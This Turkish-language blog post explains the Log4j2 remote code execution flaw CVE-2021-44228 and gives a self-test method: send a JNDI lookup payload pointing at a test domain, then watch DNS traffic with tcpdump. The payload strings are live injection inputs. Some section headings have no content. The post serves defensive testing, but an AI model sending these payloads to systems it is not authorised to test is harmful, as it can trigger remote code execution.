"Enter"a basıp içeriğe geçin

Apache Log4j2 ( Log4j )| CVE-2021-44228 Zayıflığı

12/10/2021 tarihinde yayınlanan bu sıfırıncı gün zafiyeti oldukça etkili. Zafiyetin kaynağı log almak ve işlemek için kullanılan Apache Log4j2 ( Log4j ) servisi.

Log4j2 java tabanlı bir servis. Zafiyet, gönderilen log parametresi içerisinden sistemde uzaktan komut yürütülebilmesidir. Bu açıdan oldukça tehlikeli ve etkili.

Etkilenen Log4j2 versiyonları: 2.0 < log4j <= 2.14.1

Gönderilen temel sorgu parametresi > ${jndi:ldap://www.zafiyetmevcut79879.com/a} veya ${jndi:rmi:// www.zafiyetmevcut79879.com/a}

Sorgu parametresi hedef sitedeki java kütüphanesi üzerinde istenilen komutun çalıştırılmasına izin vermektedir.


Etkilenen sistemler listesi;


Zafiyet testi için;

Yerel sistemi dışarıya bilgi vermeden test etmek için;
İlgili girdi hedefe gönderilir (GET, POST,…)

${jndi:ldap://www.zafiyetmevcut79879.com/a}

İlgili hedef sistemde aşağıdaki sorgu çalıştırılır (wireshark, tshark, vb. araçları da kullanabilirsiniz),
(Not: www.zafiyetmevcut79879.com’u test amaçlı rastgele belirleyebilirsiniz.)

sudo tcpdump port 53 | grep "www.zafiyetmevcut79879.com" 

sorgusunu görüyorsanız zayıflık mevcuttur. (Ancak servis yapısı gereği domain okuyan ve işleyen başka bir alt servis varsa bu sorgu false positive verebilir. Bu nedenle yerel olmayan sistem ve servislerde bu yöntem önerilmez…)
Ayrıca ilgili sistem, kendi DNS sunucusunda sorgu oluşturuyorsa oradan da zafiyeti doğrulayabilirsiniz.

Daha hızlı ve birden fazla sistemde zafiyet olup olmadığını doğrulamak için bu sayfada belirtilen “zayıflık test” ve “zayıflık test” bağlantılarını kullanabilirsiniz.


Zayıflığın azaltılması;


Zayıflık tespiti;


Referanslar